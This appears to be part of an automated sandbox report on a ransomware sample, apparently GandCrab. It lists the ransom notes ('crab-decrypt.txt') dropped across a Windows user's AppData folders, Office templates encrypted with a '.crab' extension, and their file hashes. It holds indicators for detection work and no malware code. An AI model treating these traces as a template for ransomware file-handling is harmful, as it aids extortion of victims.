c:\users\nd9e1fyi\appdata\roaming\adobe\sonar\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\adobe\sonar\sonar1.0\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\macromedia\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\macromedia\flash player\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\macromedia\flash player\#sharedobjects\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\macromedia\flash player\#sharedobjects\p7ub2489\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\macromedia\flash player\macromedia.com\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\macromedia\flash player\macromedia.com\support\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\addins\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\credentials\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\crypto\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\crypto\rsa\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2172869166-1497266965-2109836178-1000\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\document building blocks\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\document building blocks\1033\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\document building blocks\1033\16\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\excel\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\excel\xlstart\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\inputmethod\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\inputmethod\chs\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\internet explorer\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\internet explorer\quick launch\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\implicitappshortcuts\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\taskbar\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\internet explorer\userdata\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\internet explorer\userdata\low\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\mmc\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\network\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\network\connections\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\network\connections\pbk\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\network\connections\pbk\_hiddenpbk\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\office\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\office\recent\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\outlook\crab-decrypt.txt 3.62 KB MD5: 6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a
SHA256: 9a94a549d2df12ea627b1e4eb19f92ccf17ff5fe7e830c2d33449904b45ab87f
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851225[[fn=mlaseventheditionofficeonline]].xsl.crab 249.42 KB MD5: 4b2043e07bdf5596e6197487f9f40d34
SHA1: 8e62bffd6f0c95864f45b0b1babdb9cc4a2ee4fa
SHA256: 9b9bec6b49991d9a439ca510b1de52021cea0bb8960669ea22af4518c2b8f4ab
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851226[[fn=turabian]].xsl.crab 336.75 KB MD5: 44062a35b792b4bf1e57e17a325058ee
SHA1: f7dd767a91869f10f978f2fc79d571df9ead2ad9
SHA256: 82ae22d960a05e49e6b310f9207cdd49d429cea525059bcefb08256bafb289f2
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851227[[fn=sist02]].xsl.crab 245.62 KB MD5: be9be8e8185b1db91ee795e30c85f256
SHA1: 005003743237d086c1c3ee11fb86030bc314ab35
SHA256: 92c2d90539a79c193613f76edf4208c59c70adc5de101e0dc0ef21ac794bc2b8
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm01840907[[fn=equations]].dotx.crab 51.14 KB MD5: c0f7cf1e3a872e16426d93beb364e06b
SHA1: 75b1316d4c8f93c7d49768e7b5e835c850985b3c
SHA256: bb4a654c0f191513789f4f013f1122b1cbaeac16dcdbef6d71a79f2de448f01a
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835231[[fn=text cover with toc (student report blue design)]].docx.crab 60.73 KB MD5: b869abad1cb2199f2195b4b5ec4d462a
SHA1: 52098cf58ca2901d5a40d58dd59784d53213eeca
SHA256: 3f9e268bb8cd8d4d5190cda23992125947e255ac902b43c0e51418684ef9f492
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835232[[fn=text cover (student report blue design)]].docx.crab 57.17 KB MD5: fa72bf3a655b4c5affc16a70a93bea15
SHA1: ccab411d9d9cd942d51c88b2f7cd91eda572c60c
SHA256: 8073145784513807066d12a4b5548c5f43bbd757078f96e1fd808dfe4a25bfc3
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835233[[fn=text sidebar (annual report red and black design)]].docx.crab 46.70 KB MD5: 78e72cd292c5351eca5a8375a13457e6
SHA1: 2a3ed44e144636294684441b40f0036ae3820fa5
SHA256: 5af907563eba64470e8671bd0043a88a7bb0641215a7761d3e312d7b8f85e621
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835264[[fn=cover page (annual report red and black design)]].docx.crab 58.22 KB MD5: e673fd9791f449b78ba95a84be2c3e45
SHA1: 49b1ff7ffa4a651dad8258802be372915ccb1245
SHA256: 23dced46bccd630948415d819aac4135629e178bedf6ff80785534f8ca5b1754
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835265[[fn=cover page (annual report timeless design)]].docx.crab 57.66 KB MD5: 6e26733cbce8340543b8eb230088fef6
SHA1: 1e188f87bc4dec473b7756285fe29de238f4d931
SHA256: f52af90c611a18e2c8f51635d42bff50e4162ba1fd8da13f43962654942cf198
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835266[[fn=cover letter (chronological resume simple design)]].docx.crab 56.11 KB MD5: 0e39b656e93e1f2d94474fc53ce861f4
SHA1: 5fa79a49ebcd3d308b475323afb1e8bdce0aa648
SHA256: 50c22d6a352e410ba7c7a735115ac3bff327158e7640659c3100e720d3726521
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835267[[fn=cover with logo (annual report red and black design)]].docx.crab 62.42 KB MD5: 1256509515d9827654d834f1184d3f7a
SHA1: 6008657a375eb6430ea942b8fe5029a87b49564d
SHA256: 533091ded7c4fcaef3fae1b8032b61eb5991345dc27cc6146b12595ec8568277
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835268[[fn=photo cover (student report blue design)]].docx.crab 314.64 KB MD5: 14b5315288999531d81f9314e7e34776
SHA1: f44a6a7ccd4ac23dfe6831816e3a12e2627c69c8
SHA256: d601b2996924f0f8fd2bcd3524b03bcaa4c18e35a7f018d75af8bca9c0ec4a1e
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835269[[fn=photo cover with toc (student report blue design)]].docx.crab 307.30 KB MD5: eab6473a699d1159127435b25e8bc96c
SHA1: 6d98a3ce80d7e37ff2915d29315a5283d22472c7
SHA256: 243adc5ea466e188024d5c4fbd7efd2015d416af72f7c588122f9f0f1d3057ba
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835270[[fn=photo sidebar (annual report red and black design)]].docx.crab 226.34 KB MD5: d53cd613cffabd7504960f313af39bfd
SHA1: cf82d8f7ed6e7d1f179a0372a8715ce2ea0781ab
SHA256: 37a0d1fd5249d3b46754cc02db73add8ef6633935f289c6f0d072c55e3ae31c6
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835271[[fn=sample table (annual report red and black design)]].docx.crab 29.44 KB MD5: 25e86197f269606061e99c525b826b9d
SHA1: fb1fb02b7866d5d58e7863e39ac1fe52af7b4c1c
SHA256: 08e70e5b5086a7850624dd67a23db8546e9a014e3b84194cc143d9c6d4e75960
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835272[[fn=sample table (annual report timeless design)]].docx.crab 44.88 KB MD5: 61388293531b46cd5f842f527b2f9c4f
SHA1: 7e6c8d8ee04c8bd786a38e503a833b087cb480ae
SHA256: fba55f3ce489ff3e3cfd43287a9c69c11d80c8480f0075dda9a0e517670455b0
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02836362[[fn=cover letter (resume timeless design)]].docx.crab 50.31 KB MD5: 22854804b436b218cc99ab26875eb0a0
SHA1: 1b127643d3a961e45bdd3e0d27e7fa12462d8fbc
SHA256: 7bd6a51d444bdd7104c5ca3f528e03cc79e4c6c15d65c8158d7cef38669fe969
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm03998158[[fn=element]].dotx.crab 34.12 KB MD5: 612b1dc58dbcfbfd17bfad854fb703f5
SHA1: 724806bfdeba99459533cb105f7444d23bd86283
SHA256: 950496b0baa7be92a9ebc70acf6e40b02ffe0ae7db72b674741fd97002dce3f0
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm03998159[[fn=insight]].dotx.crab 2.10 MB MD5: be5b4996fd89147059141be0f4f7aaad
SHA1: d6d318d3d3b7585dda2417a77dc05928573c500d
SHA256: e03a9bb3500e1ebb9a09e27b3eb88784bf500357200bf38245364db6f267a7c0
False
Modified Files
Filename File Size Hash Values YARA Match Actions
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328998[[fn=rings]].glox 5.55 KB MD5: 7b5463e779c711141bdb0aab95e6c291
SHA1: 31df7fa39a30c29bc7277132e3c015111e245f85
SHA256: 361e1f51dedfdc09067da71162bc5f157c6fbef0939389b471a2d8eae0fa501e
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851216[[fn=apasixtheditionofficeonline]].xsl 325.97 KB MD5: 3f7678f540f2feebf27d6ae9187ee201
SHA1: 7b37f9e01b0f6943b8b0f20543d86a2349dbf0f5
SHA256: 5230eee8d3b9babf936d7b07aaf5b6d4cf91e44ca6273c7eba80cd995997cca1
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851217[[fn=chicago]].xsl 290.23 KB MD5: 7c9bab85dc6f44b0680870236dc39797
SHA1: 6a4490193648de3a10a2651d4c0b7859d1ab7ca9
SHA256: 192ba13f790df8e2ddbf36abb23675c6538da6edc1e435701694aafd9e2461cb
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851218[[fn=gb]].xsl 262.55 KB MD5: 3813e117db4e799353de8276040b766f
SHA1: db184f39e76e62672814a03bb41d293141bbd2c1
SHA256: f92abd100dc162b2ba2d2a38f6611d1918c0a9aa9bd8cc6a819b94bfb8c9019e
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851219[[fn=gostname]].xsl 250.47 KB MD5: b1aa46c87dc394a091e2a55110200a9b
SHA1: 6f55b2afafeb26ae792e70c0e8cffaa372b60812
SHA256: 348ce98e1dfcfe6106cbc6ad1a57721d54b16d018b921cf5ac5888d64bd105e8
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851220[[fn=gosttitle]].xsl 245.67 KB MD5: f5eb849610408d7bc90b352a583c9429
SHA1: 1a6c2c0ef4c95b9a40669b89bc484871ebccd65d
SHA256: d38622af4b4854bd60ebf74778ccda9bf60f1948b88d4425f94a6d8349875513
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851221[[fn=harvardanglia2008officeonline]].xsl 278.27 KB MD5: 2ce52392f75c2a1c91bf934bc9abcfc7
SHA1: 9c01a309d640215edc93a67c6a2ced756dcb33e5
SHA256: 4f8945769454598b2deac94cc77fbe988a4dbc8a298ea4792478e5997f1d63e9
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851222[[fn=ieee2006officeonline]].xsl 287.81 KB MD5: c318ee90423b931bd4cb146deeb53295
SHA1: c1381fe7719896a21d6b2ac340224728d28ef610
SHA256: 0d4099b710ed54a47a2ecda28a1cc0284c0230988fa46044471a107e9df4e184
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851223[[fn=iso690]].xsl 264.39 KB MD5: 51a4d4d28d7cc5a5eef8212bee0fa975
SHA1: e832d5deaeac4ecd43953a59c76aac9f924a504f
SHA256: c5ef49dee0bd8dd02e4c8bc0e3824b673a097a9fc7009fc562efb8df1aab03b9
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851224[[fn=iso690nmerical]].xsl 212.58 KB MD5: 379d083a1602eee30923c25a8031a9d0
SHA1: c840d2751a91ec18b8666507e212f71fe49bfed6
SHA256: 9a94a549d2df12ea627b1e4eb19f92ccf17ff5fe7e830c2d33449904b45ab87f
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851225[[fn=mlaseventheditionofficeonline]].xsl 249.42 KB MD5: 4b2043e07bdf5596e6197487f9f40d34
SHA1: 8e62bffd6f0c95864f45b0b1babdb9cc4a2ee4fa
SHA256: 9b9bec6b49991d9a439ca510b1de52021cea0bb8960669ea22af4518c2b8f4ab
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851226[[fn=turabian]].xsl 336.75 KB MD5: 44062a35b792b4bf1e57e17a325058ee
SHA1: f7dd767a91869f10f978f2fc79d571df9ead2ad9
SHA256: 82ae22d960a05e49e6b310f9207cdd49d429cea525059bcefb08256bafb289f2
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851227[[fn=sist02]].xsl 245.62 KB MD5: be9be8e8185b1db91ee795e30c85f256
SHA1: 005003743237d086c1c3ee11fb86030bc314ab35
SHA256: 92c2d90539a79c193613f76edf4208c59c70adc5de101e0dc0ef21ac794bc2b8
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm01840907[[fn=equations]].dotx 51.14 KB MD5: c0f7cf1e3a872e16426d93beb364e06b
SHA1: 75b1316d4c8f93c7d49768e7b5e835c850985b3c
SHA256: bb4a654c0f191513789f4f013f1122b1cbaeac16dcdbef6d71a79f2de448f01a
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835231[[fn=text cover with toc (student report blue design)]].docx 60.73 KB MD5: b869abad1cb2199f2195b4b5ec4d462a
SHA1: 52098cf58ca2901d5a40d58dd59784d53213eeca
SHA256: 3f9e268bb8cd8d4d5190cda23992125947e255ac902b43c0e51418684ef9f492
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835232[[fn=text cover (student report blue design)]].docx 57.17 KB MD5: fa72bf3a655b4c5affc16a70a93bea15
SHA1: ccab411d9d9cd942d51c88b2f7cd91eda572c60c
SHA256: 8073145784513807066d12a4b5548c5f43bbd757078f96e1fd808dfe4a25bfc3
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835233[[fn=text sidebar (annual report red and black design)]].docx 46.70 KB MD5: 78e72cd292c5351eca5a8375a13457e6
SHA1: 2a3ed44e144636294684441b40f0036ae3820fa5
SHA256: 5af907563eba64470e8671bd0043a88a7bb0641215a7761d3e312d7b8f85e621
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835264[[fn=cover page (annual report red and black design)]].docx 58.22 KB MD5: e673fd9791f449b78ba95a84be2c3e45
SHA1: 49b1ff7ffa4a651dad8258802be372915ccb1245
SHA256: 23dced46bccd630948415d819aac4135629e178bedf6ff80785534f8ca5b1754
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835265[[fn=cover page (annual report timeless design)]].docx 57.66 KB MD5: 6e26733cbce8340543b8eb230088fef6
SHA1: 1e188f87bc4dec473b7756285fe29de238f4d931
SHA256: f52af90c611a18e2c8f51635d42bff50e4162ba1fd8da13f43962654942cf198
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835266[[fn=cover letter (chronological resume simple design)]].docx 56.11 KB MD5: 0e39b656e93e1f2d94474fc53ce861f4
SHA1: 5fa79a49ebcd3d308b475323afb1e8bdce0aa648
SHA256: 50c22d6a352e410ba7c7a735115ac3bff327158e7640659c3100e720d3726521
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835267[[fn=cover with logo (annual report red and black design)]].docx 62.42 KB MD5: 1256509515d9827654d834f1184d3f7a
SHA1: 6008657a375eb6430ea942b8fe5029a87b49564d
SHA256: 533091ded7c4fcaef3fae1b8032b61eb5991345dc27cc6146b12595ec8568277
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835268[[fn=photo cover (student report blue design)]].docx 314.64 KB MD5: 14b5315288999531d81f9314e7e34776
SHA1: f44a6a7ccd4ac23dfe6831816e3a12e2627c69c8
SHA256: d601b2996924f0f8fd2bcd3524b03bcaa4c18e35a7f018d75af8bca9c0ec4a1e
False
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835269[[fn=photo cover with toc (student report blue design)]].docx 307.30 KB MD5: eab6473a699d1159127435b25e8bc96c
SHA1: 6d98a3ce80d7e37ff2915d29315a5283d22472c7
SHA256: 243adc5ea466e188024d5c4fbd7efd2015d416af72f7c588122f9f0f1d3057ba
False
